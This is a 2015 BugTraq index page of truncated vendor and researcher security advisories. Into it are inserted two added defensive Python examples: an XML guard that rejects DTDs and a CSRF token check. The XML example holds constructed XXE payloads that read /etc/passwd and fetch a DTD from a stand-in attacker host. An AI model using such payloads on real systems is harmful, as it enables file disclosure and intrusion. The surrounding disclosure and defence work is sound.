BugTraq Latest Security Advisories

The premier general security mailing list. Vulnerabilities are often announced here first, so check frequently!

FreeBSD Security Advisory FreeBSD-SA-15:23.bind

September 3, 2015 - 3:25am

Posted by FreeBSD Security Advisories on Sep 03

=============================================================================
FreeBSD-SA-15:23.bind Security Advisory
The FreeBSD Project

Topic: BIND remote denial of service vulnerability

Category: contrib
Module: bind
Announced: 2015-09-02
Credits: ISC
Affects: FreeBSD 9.x
Corrected: 2015-09-02...

[SECURITY] [DSA 3348-1] qemu security update

September 2, 2015 - 12:47pm

Posted by Salvatore Bonaccorso on Sep 02

-------------------------------------------------------------------------
Debian Security Advisory DSA-3348-1 security () debian org
https://www.debian.org/security/ Salvatore Bonaccorso
September 02, 2015 https://www.debian.org/security/faq
-------------------------------------------------------------------------

Package : qemu
CVE ID : CVE-2015-3214 CVE-2015-5154...

[SECURITY] [DSA 3349-1] qemu-kvm security update

September 2, 2015 - 12:40pm

Posted by Salvatore Bonaccorso on Sep 02

-------------------------------------------------------------------------
Debian Security Advisory DSA-3349-1 security () debian org
https://www.debian.org/security/ Salvatore Bonaccorso
September 02, 2015 https://www.debian.org/security/faq
-------------------------------------------------------------------------

Package : qemu-kvm
CVE ID : CVE-2015-5165 CVE-2015-5745...

Cisco Security Advisory: Cisco Integrated Management Controller Supervisor and Cisco UCS Director Remote File Overwrite Vulnerability

September 2, 2015 - 12:32pm

Posted by Cisco Systems Product Security Incident Response Team on Sep 02

Cisco Security Advisory: Cisco Integrated Management Controller Supervisor and Cisco UCS Director Remote File Overwrite
Vulnerability

Advisory ID: cisco-sa-20150902-cimcs

Revision 1.0

For Public Release 2015 September 2 16:00 UTC (GMT)

+-----------------------------------------------------------------------

Summary
=======
Cisco Integrated Management Controller (IMC) Supervisor and Cisco UCS Director contain a remote file overwrite...

[SECURITY] [DSA 3347-1] pdns security update

September 2, 2015 - 10:51am

Posted by Sébastien Delafond on Sep 02

-------------------------------------------------------------------------
Debian Security Advisory DSA-3347-1 security () debian org
https://www.debian.org/security/ Sebastien Delafond
September 02, 2015 https://www.debian.org/security/faq
-------------------------------------------------------------------------

Package : pdns
CVE ID : CVE-2015-5230

Pyry Hakulinen and...

ESA-2015-137: EMC Atmos XML External Entity Injection Vulnerability

September 2, 2015 - 9:07am

Posted by Security Alert on Sep 02

ESA-2015-137: EMC Atmos XML External Entity Injection Vulnerability

EMC Identifier: ESA-2015-137

CVE Identifier: CVE-2015-4538

Severity Rating: CVSS v2 Base Score: 7.5 (AV:N/AC:L/Au:S/C:C/I:N/A:P)

Affected products:
EMC Atmos 2.3.0 and earlier

Summary:
EMC Atmos includes an XML External Entity Injection vulnerability.

Details:

EMC Atmos is affected by an XML External Entity (XXE) Injection vulnerability due to the configuration of...
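The advisory is cut off before it names the parser configuration at fault. Whatever that option was, the control that removes the XXE class on the receiving side is the same: refuse any document that declares a DTD or an entity before it reaches the real parser. The code below is an added example, not Atmos code; it uses only the Python standard library, and the three sample documents are constructed for the example.

```python
# Added example (not from the EMC advisory): DTD-rejecting XML parsing for
# untrusted input, the same policy defusedxml applies with forbid_dtd=True.
import xml.etree.ElementTree as ET
import xml.parsers.expat as expat

# Constructed samples for this example; not taken from the advisory.
BENIGN = b'<?xml version="1.0"?><data><item>hello</item></data>'
XXE = (b'<?xml version="1.0"?>\n'
       b'<!DOCTYPE data [\n'
       b'  <!ENTITY xxe SYSTEM "file:///etc/passwd">\n'
       b']>\n'
       b'<data>&xxe;</data>')
# External DTD with no inline entity: still rejected, since the DTD itself
# could define entities once fetched.
DTD_ONLY = (b'<?xml version="1.0"?>'
            b'<!DOCTYPE data SYSTEM "http://attacker.example/evil.dtd"><data/>')


class DtdForbidden(ValueError):
    """Raised when untrusted XML carries a DOCTYPE or an entity declaration."""


def _forbid_doctype(name, sysid, pubid, has_internal_subset):
    raise DtdForbidden(f"DOCTYPE {name!r} rejected (system id {sysid!r})")


def _forbid_entity(name, is_param, value, base, sysid, pubid, notation):
    raise DtdForbidden(f"entity declaration {name!r} rejected")


def _forbid_external(context, base, sysid, pubid):
    raise DtdForbidden(f"external entity reference to {sysid!r} rejected")


def parse_untrusted(data: bytes) -> ET.Element:
    """Parse XML from an untrusted source, refusing DTDs and entity declarations.

    Pass 1: an expat parser whose handlers abort the moment a DOCTYPE, an
    ENTITY declaration or an external entity reference appears, i.e. before
    any resolver could be invoked.  Pass 2: the bytes, now known to carry no
    DTD, go to ElementTree.  Rejecting the DTD outright rather than only
    external entities also shuts down billion-laughs style internal expansion.
    """
    guard = expat.ParserCreate()
    guard.StartDoctypeDeclHandler = _forbid_doctype
    guard.EntityDeclHandler = _forbid_entity
    guard.ExternalEntityRefHandler = _forbid_external
    guard.Parse(data, True)          # raises DtdForbidden or expat.ExpatError
    return ET.fromstring(data)


def is_dtd_free(data: bytes) -> bool:
    """Boolean form of the same check, for use in a request filter.

    Malformed XML is also reported as False: a filter in front of a parser
    has no reason to let it through either.
    """
    try:
        parse_untrusted(data)
    except (DtdForbidden, expat.ExpatError, ET.ParseError):
        return False
    return True


if __name__ == "__main__":
    for label, doc in (("benign", BENIGN), ("xxe", XXE), ("dtd-only", DTD_ONLY)):
        print(label, "accepted" if is_dtd_free(doc) else "rejected")
```

The guard runs before the document is parsed for content, so it works the same whether the application later uses ElementTree, lxml or a SAX pipeline; the cost is that legitimate documents with a DOCTYPE are refused too, which for a storage API accepting machine-generated XML is normally the right trade.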

Cross-Site Request Forgery in Cerb

September 2, 2015 - 6:20am

Posted by High-Tech Bridge Security Research on Sep 02

Advisory ID: HTB23269
Product: Cerb
Vendor: Webgroup Media LLC
Vulnerable Version(s): 7.0.3 and probably prior
Tested Version: 7.0.3
Advisory Publication: August 12, 2015 [without technical details]
Vendor Notification: August 12, 2015
Vendor Patch: August 14, 2015
Public Disclosure: September 2, 2015
Vulnerability Type: Cross-Site Request Forgery [CWE-352]
CVE Reference: CVE-2015-6545
Risk Level: Medium
CVSSv2 Base Score: 5.1...

[slackware-security] gdk-pixbuf2 (SSA:2015-244-01)

September 2, 2015 - 6:12am

Posted by Slackware Security Team on Sep 02

[slackware-security] gdk-pixbuf2 (SSA:2015-244-01)

New gdk-pixbuf2 packages are available for Slackware 13.37, 14.0, 14.1,
and -current to fix a security issue.

Here are the details from the Slackware 14.1 ChangeLog:
+--------------------------+
patches/packages/gdk-pixbuf2-2.28.2-i486-2_slack14.1.txz: Rebuilt.
Gustavo Grieco discovered a heap overflow in the processing of BMP images
which may result in the execution of arbitrary code if...

CVE-2015-5603: JIRA and the HipChat For JIRA plugin - Velocity Template Injection

September 2, 2015 - 6:05am

Posted by David Black on Sep 02

Note: the current version of this advisory can be found at
https://confluence.atlassian.com/x/IcBKLg .

CVE ID: CVE-2015-5603
Product: JIRA and the HipChat for JIRA plugin.
Affected HipChat For JIRA plugin versions: 1.3.2 <= version < 6.30.0
Affected JIRA product versions: 6.3.5 <= version < 6.4.11

Summary:
This advisory discloses a critical severity security vulnerability
that was introduced in version 1.3.2 of the HipChat for JIRA...

KL-001-2015-004 : XGI Windows VGA Display Manager Arbitrary Write Privilege Escalation

September 2, 2015 - 5:56am

Posted by KoreLogic Disclosures on Sep 02

KL-001-2015-004 : XGI Windows VGA Display Manager Arbitrary Write
Privilege Escalation

Title: XGI Windows VGA Display Manager Arbitrary Write Privilege Escalation
Advisory ID: KL-001-2015-004
Publication Date: 2015.09.01
Publication URL:
https://www.korelogic.com/Resources/Advisories/KL-001-2015-004.txt

1. Vulnerability Details

Affected Vendor: Silicon Integrated Systems Corporation
Affected Product: XGI VGA Display Manager...

KL-001-2015-003 : SiS Windows VGA Display Manager Multiple Privilege Escalation

September 1, 2015 - 2:46pm

Posted by KoreLogic Disclosures on Sep 01

KL-001-2015-003 : SiS Windows VGA Display Manager Multiple Privilege
Escalation

Title: SiS Windows VGA Display Manager Multiple Privilege Escalation
Advisory ID: KL-001-2015-003
Publication Date: 2015.09.01
Publication URL:
https://www.korelogic.com/Resources/Advisories/KL-001-2015-003.txt

1. Vulnerability Details

Affected Vendor: Silicon Integrated Systems Corporation
Affected Product: Windows VGA Display Manager
Affected...

[CORE-2015-0013] - FortiClient Antivirus Multiple Vulnerabilities

September 1, 2015 - 12:31pm

Posted by CORE Advisories Team on Sep 01

1. Advisory Information

Title: FortiClient Antivirus Multiple Vulnerabilities
Advisory ID: CORE-2015-0013
Advisory URL: http://www.coresecurity.com/advisories/forticlient-antivirus-multiple-vulnerabilities
Date published: 2015-09-01
Date of last update: 2015-09-01
Vendors contacted: Fortinet
Release mode: Coordinated release

2. Vulnerability Information

Class: Information Exposure [CWE-200], Write-what-where Condition [CWE-123], Exposed...

[security bulletin] HPSBMU03339 rev.1 - HP LoadRunner Controller, Local Execution of Arbitrary Code

September 1, 2015 - 12:22pm

Posted by security-alert on Sep 01

Note: the current version of the following document is available here:
https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04692147

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c04692147
Version: 1

HPSBMU03339 rev.1 - HP LoadRunner Controller, Local Execution of Arbitrary
Code

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2015-09-01
Last...

[security bulletin] HPSBGN03403 rev.1 - HP Virtualization Performance Viewer, Remote Unauthorized Disclosure of Information

August 31, 2015 - 1:30pm

Posted by security-alert on Aug 31

Note: the current version of the following document is available here:
https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04773256

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c04773256
Version: 1

HPSBGN03403 rev.1 - HP Virtualization Performance Viewer, Remote Unauthorized
Disclosure of Information

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release...

[security bulletin] HPSBMU03401 rev.1 - HP Operations Manager for UNIX and Linux, Remote Unauthorized Modification, Disclosure of Information

August 31, 2015 - 1:22pm

Posted by security-alert on Aug 31

Note: the current version of the following document is available here:
https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04770140

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c04770140
Version: 1

HPSBMU03401 rev.1 - HP Operations Manager for UNIX and Linux, Remote
Unauthorized Modification, Disclosure of Information

NOTICE: The information in this Security Bulletin should be acted upon as
soon as...

Dogma India dogmaindia CMS - Auth Bypass Vulnerability

August 31, 2015 - 7:06am

Posted by Vulnerability Lab on Aug 31

Document Title:
===============
Dogma India dogmaindia CMS - Auth Bypass Vulnerability

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1583

Release Date:
=============
2015-08-25

Vulnerability Laboratory ID (VL-ID):
====================================
1583

Common Vulnerability Scoring System:
====================================
8.1

Product & Service Introduction:...

[SECURITY] [DSA 3346-1] drupal7 security update

August 31, 2015 - 6:57am

Posted by Alessandro Ghedini on Aug 31

-------------------------------------------------------------------------
Debian Security Advisory DSA-3346-1 security () debian org
https://www.debian.org/security/ Alessandro Ghedini
August 31, 2015 https://www.debian.org/security/faq
-------------------------------------------------------------------------

Package : drupal7
CVE ID : CVE-2015-6658 CVE-2015-6659...

Jenkins 1.626 - Cross Site Request Forgery / Code Execution

August 31, 2015 - 6:49am

Posted by smash on Aug 31

#Title: Jenkins 1.626 - Cross Site Request Forgery / Code Execution
#Date: 27.08.15
#Affected versions: => 1.626 (current)
#Vendor: jenkins-ci.org
#Contact: smash [at] devilteam.pl

Cross site request forgery vulnerability in Jenkins 1.626 allows remote attackers to hijack the authentication of users
for most requests. Using CSRF it is possible to change specific settings or even execute code on the OS as shown below.

Examples:

<html>...
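The post's HTML proof of concept is cut off above. As an added example, not code from the post or from Jenkins, here is the server-side check that makes such an auto-submitting form useless: a per-session synchronizer token compared in constant time, with an Origin/Referer check as a second, independent layer. SITE_ORIGIN, the request shapes and the session dict are assumptions made for the example.

```python
# Added example (not from the post or from Jenkins): CSRF protection for a
# state-changing endpoint, synchronizer token plus Origin/Referer check.
import hmac
import secrets
from urllib.parse import urlsplit

SITE_ORIGIN = "https://jenkins.example.com"   # hypothetical deployment origin
SAFE_METHODS = ("GET", "HEAD", "OPTIONS")


def issue_token(session: dict) -> str:
    """Bind a fresh random token to the session and return it for embedding
    in forms.  Call once per session (or per form); the attacker's page
    cannot read it because of the same-origin policy."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def _origin_ok(headers: dict) -> bool:
    # Browsers send Origin (or at least Referer) on cross-site form POSTs.
    # A request carrying neither is treated as cross-site; that rejects some
    # privacy-tool users but never lets a forged request through.
    origin = headers.get("Origin")
    if origin is None:
        referer = headers.get("Referer")
        if referer is None:
            return False
        u = urlsplit(referer)
        origin = f"{u.scheme}://{u.netloc}"
    return origin == SITE_ORIGIN


def csrf_check(method: str, headers: dict, form: dict, session: dict) -> bool:
    """True if a request may proceed to change state."""
    if method.upper() in SAFE_METHODS:
        return True           # safe methods must not change state at all
    if not _origin_ok(headers):
        return False
    expected = session.get("csrf_token")
    supplied = form.get("csrf_token", "")
    if not expected:
        return False          # session never received a token: nothing to match
    # Constant-time compare so a timing oracle cannot recover the token.
    return hmac.compare_digest(expected.encode(), supplied.encode())


if __name__ == "__main__":
    session = {}
    token = issue_token(session)
    # A forged POST from an attacker page: wrong Origin, no token.
    print("forged:", csrf_check("POST", {"Origin": "https://evil.example"}, {}, session))
    # The same action submitted from the site's own form.
    print("legit: ", csrf_check("POST", {"Origin": SITE_ORIGIN},
                                {"csrf_token": token}, session))
```

Either layer alone stops the forged form in the post: the attacker's page cannot read the token, and its POST arrives with its own Origin. Keeping both means a bug in one (a token accidentally leaked into a GET URL, say) is not immediately fatal.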

LinuxOptic CMS 2009 - Auth Bypass Session Vulnerability

August 31, 2015 - 6:41am

Posted by Vulnerability Lab on Aug 31

Document Title:
===============
LinuxOptic CMS 2009 - Auth Bypass Session Vulnerability

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1585

Release Date:
=============
2015-08-26

Vulnerability Laboratory ID (VL-ID):
====================================
1585

Common Vulnerability Scoring System:
====================================
8.1

Product & Service Introduction:...

PayPal Bug Bounty #119 - Stored Cross Site Scripting Vulnerability

August 31, 2015 - 6:33am

Posted by Vulnerability Lab on Aug 31

Document Title:
===============
PayPal Bug Bounty #119 - Stored Cross Site Scripting Vulnerability

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1588

Video: http://www.vulnerability-lab.com/get_content.php?id=1587

Vulnerability Magazine:
http://magazine.vulnerability-db.com/?q=articles/2015/08/28/paypal-inc-bug-bounty-2015-stored-cross-site-vulnerability-disclosed-researcher

Release Date:...